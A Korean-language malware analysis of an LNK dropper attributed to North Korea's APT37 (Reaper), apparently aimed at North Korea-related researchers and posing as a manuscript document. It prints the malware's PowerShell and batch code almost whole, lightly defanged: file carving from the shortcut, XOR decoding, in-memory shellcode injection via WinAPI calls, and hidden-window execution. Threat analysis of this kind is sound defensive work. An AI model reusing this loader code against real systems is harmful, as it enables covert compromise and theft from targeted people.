대북관계자를 노리는 북한 해킹 단체 리퍼(Reaper)에서 만든 악성코드-국가정보와 방첩 원고.lnk(2025.6.3)

오늘은 오래간만에 북한 해킹 단체 리퍼(Reaper,APT 37) 에서 만든 악성코드인 국가정보와 방첩 원고.lnk에 대해 알아보겠습니다.
RoKRAT은 대한민국에서 대북관계자 분들을 대상으로 하는 것이 특징이 있으며 대북 인권단체, 북한 취재 기자,탈북민,대북 관한 대학교수도 포함이 됩니다.
파일명:국가정보와 방첩 원고.lnk
사이즈:52 MB
MD5:f6d72abf9ca654a20bbaf23ea1c10a55
SHA-1:543e3b4b74257c3ffcd45dcdd8c842489a82bc07
SHA-256:90bf1f20f962d04f8ae3f936d0f9046da28a75fa2fb37f267ff0453f272c60a0
입니다.

악성코드 에 포함된 PowerShell 코드

악성코드 PowerShell 코드

StringData
{
    namestring: 
    relativepath: not present
    workingdir: not present
    commandlinearguments: /k for /f "token(s)=*" %a in ('dir C:\Windows\SysWow64\WindowsPowerShell
    \v1(.)0\*rshell(.)exe /s /b /od') do call %a "$dirPath = Get-Location; if($dirPath -(M)atch 'Sys
    t(e)m32' -or $dirPath -Matc(h) 'Program (F)iles') {$dirPath = '%te(m)p%'};$exs=@('(.)lnk');$l
    nkPath = Get-ChildI(t)em -Path $dirPath -Recu(r)se *.* -File | where {$_.exten(s)ion -in $exs
    } | wher(e)-object {$_.length -eq 0(x)033A6B2A} | Select-Object -ExpandProperty FullName ;$ln
    kFile=New-Object System.IO.FileStream($lnkPath, [System.IO.FileMode]::Open, [System.IO.FileA
    ccess]::R(e)ad);$lnkFile.Seek(0x00001006, 0);$pdfFile=New-Object byte[] 0x0001C000;$lnkFile.
    Re(a)d($pdfFile, 0, 0x0001(C)000);$p(d)fPath = $lnkPath.replace('(.)lnk','(.)hwp');sc $p(d)
    fPath $pdfFile -Enc(o)ding Byte;& $pdfPath;$lnkFile.Seek(0x0(0)01D006, 0);$exeFile=New-Obje
    ct byte[] 0x000(D)CB90;$lnkFile.Read($exeFile, 0, 0x000DCB90);($)exePath=$env:temp(+)'\ttf0
    1(.)dat';sc $exePath $exeFile -Encoding (B)yte;$lnkFile.Seek(0x000F9(B)96,0);$stringByte =
    New-Object byte[] 0x00(0)00634;$lnkFile.Read($stringByte, 0, 0x00000634); $batStrPath = $e
    nv:temp+'\'+'ttf02.dat';$string = [Text.Encoding](:):GetEncoding('u(t)f-8').GetString($str
    ingByte);$string | Out-File -FilePath $batStrPath -Encoding ascii;$lnkFile.Seek(0x000FA1CA
    ,0);$b(a)tByte = New-Object byte[] 0x000(0)014C;$lnkFile.Read($batByte, 0, 0x0000014C);$ex
    ecutePath = $env:temp+'\'+'ttf0'+'3.b'(+)'a'(+)'t'; Write-Host $executePath; Write-Ho(s)t 
    $batStrPath; $bastString = [System.Text.Encoding]::UTF8.GetStri(n)g($batByte);$bastString 
    | Out-File -F(i)lePath $executePath -Encoding ascii; &$executePath; $lnkFile.Close();[Syst
    em.IO.File]::Delete($lnkPath);"&& exit
    iconlocation: C:\Windows\System32\shell32(.)dll
}

악성코드 PowerShell 분석

.lnk (바로 가기) 파일에서 특정 오프셋의 데이터를 추출하고 나서 .hwp,.dat,.bat 등 다양한 파일로 복원하고 악성코드를 동작하는 것이 특징입니다. 실행
1. 악성코드 CMD 구문:
/k 는 CMD 창을 열고 계속 유지하지만, 마지막에 && exit로 창을 종료하는 것이 특징
for /f 는 PowerShell 실행 가능한 파일을 찾으려고 디렉터리를 탐색
call %a "<(p)s_script>"는 찾은 실행파일을 PowerShell 스크립트 와 동시에 호출
2. 악성코드 실행 및 대상 검색:
rshell.exe->reverse shell (rshell)
/s /b /od->하위 폴더까지,전체 경로 출력,수정날짜 기준 정렬
3. 현재 위치 확인 및 조건 분기:
시스템 보호 디렉토리에서는 작업하지 않고 %temp%로 이동
4..lnk 파일 필터링 조건:
.lnk 확장자 중 특정 크기(0x033A6B2A=약 54MB)를 갖는 파일을 필터를 진행
5.데이터 추출 및 복원:
.hwp (한글 문서로 위장)
.lnk의 특정 오프셋에서 약 114KB 데이터를 읽어. hwp로 저장 후 실행
.lnk 내부에서 두 번째 페이로드를 추출해 ttf01.dat 로 저장

악성코드 가 실행시 만들어지는 미끼 파일

ttf02.dat 내용

ttf02.dat 내용

$exePath=$env:temp+'\ttf01(.)dxt';$exeFile = Get(-)Content -path $exePath -encoding 
byte;$len=$exeFile(.)count;$newExeFile = New-Object Byte[] $len;$xK='3';for($i=0;$i -
lt $l(e)n;$i++) {$newExeFile[$i] = $exeFile[$i] -bxor $xk[0]}; [Net.Ser(v)icePointMa(n
)ager]::SecurityProtocol = [Enum]::ToObject([Net.Secu(r)ityProtocolType], 3072);$k1123
= [System.Text.Encoding]::UTF8.(G)etString(34) + 'kernel32.dll' + [System.Text.Encoding
]::UTF8.Get(S)tring(34);$a90234s = '[DllImport(' + $k1123 + ')]publ(i)c static extern IntP
tr GlobalAlloc(uint b,uint c);';$b = Add-Type -MemberDefinition $a90234s  -Name 'AAA' -(P)a
ssThru;$d3s9sdf = '[DllImport(' + $k1(1)23 + ')]public static extern bo(o)l VirtualProtect(
IntPtr a,uint b,uint c,out (I)ntPtr d);';($)a90234sb = Add-Type -MemberDefinition $d3s9sdf -
Name 'AAB' -PassThru;$b3s9s03sfse = '[DllImp(o)rt(' + $k1123 + ')]public static extern IntPtr
CreateThread(IntPtr a,uint b,In(t)Ptr c,IntPtr d,uint e,IntPtr f);';$cak(e)3sd23 = Add-Type -M
emberDefinit(i)on $b3s9s03sfse  -Name 'BBB' -PassThru;$dtts9s03sd23 = '[DllImport(' + $k1123
+ ')]public static extern IntPtr WaitForSingleObject(IntPtr a,uint b);';$fried3sd23 = Add-Ty
pe -MemberDefinition $dtts9s03sd23 -Name 'DDD' -PassThru;$byteCount = $newExeFile.Length;$bu
ffer = $b::Gl(o)balAlloc(0x0040, $byteCount + 0x100);$old = 0;$a90234sb::VirtualProt(e)ct($b
uffer, $byteCount + 0x100, 0x40, [ref]$old); for($i = 0;$i -l(t) $byteCount;$i++) { [System.
Runtime.InteropServices.Mar(s)hal]::WriteByte($buffer, $i, $newExeFile[$i]); };$handle = $ca
ke3s(d)23::CreateThread(0, 0, $buffer, 0, 0, 0);$fried3sd23::WaitForS(i)ngleObject($h
andle, 500 * 1000);

코드 분석

1. 파일 로드 및 복호화
ttf01.dat는 바이너리 실행 코드가 XOR(3)로 단순 암호화된 형태로 존재하고 있음
XOR 키 3의 ASCII 코드 (10진수 51)로 복호화
2.WinAPI 함수 선언
GlobalAlloc:메모리 버퍼 할당 
VirtualProtect:해당 메모리 영역의 보호 속성 변경(RW(읽기,쓰기->RWX(읽기,쓰기,실행)
CreateThread:새로운 스레드로 코드 실행
WaitForSingleObject:스레드 완료 대기
3. 메모리 할당 및 셸 코드 삽입
GlobalAlloc:RW 버퍼를 할당
VirtualProtect:RW->RWX 으로 변경
Marshal.WriteByte: 실제 셸 코드를 메모리에 직접 쓰기
4.실행
메모리상의 쉘코드를 새 스레드에서 실행 및 500초 동안 대기
.NET 환경에서 TLS 프로토콜 버전을 강제로 설정(3072는 TLS 1.2를 의미)
이후 원격 호출 또는 다운로드가 있을 때 TLS 1.2를 보장하기 위해서 설정

ttf03.dat 내용

ttf03.dat 내용

start /min C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell(.)exe -windowstyle hi
dden -NoExit "$stringPath=$env:temp+'\'+'ttf02(.)dat';$stringByte = Get-Content -path $st
ring(P)ath -encoding byte;$string = [System.Te(x)t.Encoding]::UTF8.GetString($stringByte);$scriptBlock = [scriptblock]::Cr(e)ate($string);Invoke-Co(m)man
d $scriptBlock;"

ttf03.dat 내용 분석

외부에서 PowerShell을 실행하는 구조로 되어 있으며 /min 옵션을 통해서 최소화된 창으로 PowerShell을 실행해서 사용자가 악성코드가 실행되고 있는지 모르게 하는 목적
32비트 PowerShell을 강제로 실행.
SysWow64 경로는 64비트 Windows에서 32비트 애플리케이션이 실행되는 경로
32비트 PowerShell을 사용해 실행됨
-NoExit
스크립트 실행 후 PowerShell 창을 종료하지 않음
디버깅 또는 이후 명령 실행을 위해 남겨두는 의도
임시 디렉터리에 있는 ttf02.dat 파일을 대상으로 지정
해당 파일을 바이트 배열(byte\[])로 읽어들임
읽은 바이트를 UTF-8로 디코딩하여 문자열로 복원
디코딩된 문자열을 PowerShell 스크립트 블록으로 변환하며 동적 코드 실행을 하는 것이 목적
최종적으로 위에서 만든 scriptBlock으로 실행
ttf02.dat 파일 내에 존재하는 코드가 메모리상에서 실행되는 것이 특징
그리고 해당 악성코드가 실행되면 성균관대학교 글로벌미래전략연구소 관련 연구원 명의의 글을 볼 수가 있습니다.